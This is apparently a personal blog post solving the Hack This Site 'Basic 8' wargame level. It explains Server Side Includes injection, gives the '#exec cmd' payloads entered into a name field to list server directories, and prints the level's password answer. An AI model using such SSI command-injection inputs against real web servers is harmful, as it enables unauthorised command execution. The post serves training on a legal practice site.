What is it? @.@

Here is the place where I record some tactics about wargame, systems, and other security issues.

2012-09-10

Hack This Site! - Basic 8

Description:

The password is yet again hidden in an unknown file. Sam's daughter has begun learning PHP, and has a small script to demonstrate her knowledge. Requirements: Knowledge of SSI (dynamic html executed by the server, rather than the browser)

Level 8

Sam remains confident that an obscured password file is still the best idea, but he screwed up with the calendar program. Sam has saved the unencrypted password file in /var/www/hackthissite.org/html/missions/basic/8/

However, Sam's young daughter Stephanie has just learned to program in PHP. She's talented for her age, but she knows nothing about security. She recently learned about saving files, and she wrote a script to demonstrate her ability.
Enter your name:
 ___________________
|___________________|
submit

Password:
 ___________________
|___________________|
submit
Solution:
  1. SSI = Server Side Includes (http://en.wikipedia.org/wiki/Server_Side_Includes)
  2. You need to use SSI injection to send code into the web application.
    Here are introduction and some examples:
    https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection
  3. If you decide to use the code below to solve the challenge, you will get a message from the website.
    Code:
    < !--#exec cmd="/bin/ls /" -- >
    OR
    < !--#exec cmd="/bin/ls ../" -- >
    Message:
    If you are trying to use server side includes to solve the challenge, you are on the right track: but I have limited the commands allowed to ones relevant towards finding the password file for security reasons(because there will always be that one person who decides to execute some rather nasty commands). So please manipulate your code so that it is a little more pertaining to the level.
  4. So, just modify your code only use "ls ../" below
    Code:
    < !--#exec cmd="ls ../" -- >
  5. Then you will get a link which indicates a randomly generated page to you.
    Your file has been saved. Please click here view the file.
  6. There's the text on the page.
    Hi, au12ha39vc.php index.php level8.php tmp!

    Your name contains 39 characters.
  7. Now you know "au12ha39vc.php" is the obscured password file.
    Visit:
    hxxp://www.hackthissite.org/missions/basic/8/au12ha39vc.php
  8. There's the text on the page.
    4285be1b
  9. Back to the level page and submit the password
  10. Congratulations, you have successfully completed basic 8!